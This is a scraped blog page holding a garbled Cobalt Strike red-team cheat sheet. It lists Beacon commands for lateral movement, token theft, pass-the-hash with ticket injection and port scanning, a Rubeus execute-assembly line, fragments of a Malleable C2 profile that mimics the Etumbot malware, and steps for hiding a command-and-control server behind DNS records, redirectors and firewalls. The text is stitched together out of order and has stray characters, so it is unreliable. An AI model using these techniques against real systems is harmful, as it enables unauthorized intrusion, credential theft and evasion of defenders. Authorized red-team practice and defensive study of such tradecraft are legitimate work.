![]() ![]() jump: Provides easy and quick way to move lateraly using winrm or psexec to spawn a new beacon session on a target.make_token: By providing credentials you can create an impersonation token into the current process and execute commands from the context of the impersonated user.steal_token: Steal a token from a specified process.:exclamation: This module needs Administrator privileges. pth: By providing a username and a NTLM hash you can perform a Pass The Hash attack and inject a TGT on the current process.runas: A wrapper of runas.exe, using credentials you can run a command as another user. ![]() ![]() portscan: Performs a portscan on a spesific target.:warning: OPSEC Advice: Use the spawnto command to change the process Beacon will launch for its post-exploitation jobs. Header "Content-Type" "application/octet-stream" īeacon > execute-assembly īeacon > execute-assembly /home/audit/Rubeus.exe Header "Accept" "text/html,application/xhtml+xml,application/xml q=0.9,*/*l q=0.8" Set useragent "Mozilla/5.0 (compatible MSIE 8.0 Windows NT 6.1 Trident/5.0)" # Etumbot Profile # Author: # set sample_name "Etumbot" Use DNS NS records to delegate several domains or sub-domains to your Cobalt Strike team server's A record. Create a DNS A record and point it to your Cobalt Strike team server. Your Cobalt Strike team server system must be authoritative for the domains you specify. Create an NS record that points to FQDN of your Cobalt Strike system.Create an A record for Cobalt Strike system.No staging set hosts_stage to false in Malleable C2.Edit default HTTP 404 page and Content type: text/plain.Firewall 50050 and access via SSH tunnel.Firewall to only accept HTTP/S from the redirectors.Metasploit compatibility, ask for a payload : wget -U "Internet Explorer".Change default self-signed HTTPS certificate. ![]()
0 Comments
Leave a Reply. |
Details
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |